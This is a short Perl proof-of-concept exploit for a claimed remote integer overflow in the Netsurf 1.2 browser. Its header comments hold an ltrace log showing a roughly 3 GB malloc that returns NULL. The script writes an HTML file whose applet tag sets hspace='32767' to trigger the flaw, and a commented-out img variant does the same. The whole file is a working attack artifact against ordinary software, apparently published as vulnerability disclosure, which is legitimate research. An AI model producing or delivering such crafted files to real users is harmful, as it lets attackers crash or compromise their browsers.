#!/usr/bin/perl
# netsurf_hspace_intof1.pl
# Netsurf 1.2 'hspace' Remote Integer Overflow PoC Exploit
# Jeremy Brown [0xjbrown41@gmail.com/jbrownsec.blogspot.com]
# 
# [ltrace log -- hspace = 30000, without --sync]
# 
# gdk_gc_set_clip_rectangle(0x8cbdaf8, 0x80c4500, 0, 0, 0)
#                                                         = 0x8cbda01
# cairo_reset_clip(0xb6600948, 0x80c4500, 0, 0, 0)
#                                                         = 0
# cairo_rectangle(0xb6600948, 0, 0, 0, 0)
#                                                         = 0
# cairo_clip(0xb6600948, 0, 0, 0, 0)
#                                                         = 0xb6600aec
# gdk_gc_set_clip_rectangle(0x8cbdaf8, 0x80c4500, 0, 0, 0)
#                                                         = 0x8cbda01
# gdk_pixbuf_get_from_drawable(0, 0x8d0ed78, 0, 0, 0 <unfinished ...>
# malloc(3073536192) /// HUGE MALLOC
#                                                         = NULL
# <... gdk_pixbuf_get_from_drawable resumed> )
#                                                         = 0
# gdk_pixbuf_scale(0, 0x8c0e238, 0, 0, 100 <unfinished ...>
# free(0xb6600dc8)
#                                                         = <void>
# free(0xb6600de0)
#                                                         = <void>
# 
# Adv Ref: netsurf_multiple_adv.txt

$filename = $ARGV[0];
if(!defined($filename))
{

     print "Usage: $0 <filename.html>\n";

}

$head = "<html>" . "\n";
$trig = "<applet code=\"test.class\" hspace=\"32767\">" . "\n";
#$trig = "<img src=\"test.jpg\" hspace=\"32767\">" . "\n";
$foot = "</html>";

$data = $head . $trig . $foot;

     open(FILE, '>' . $filename);
     print FILE $data;
     close(FILE);

exit;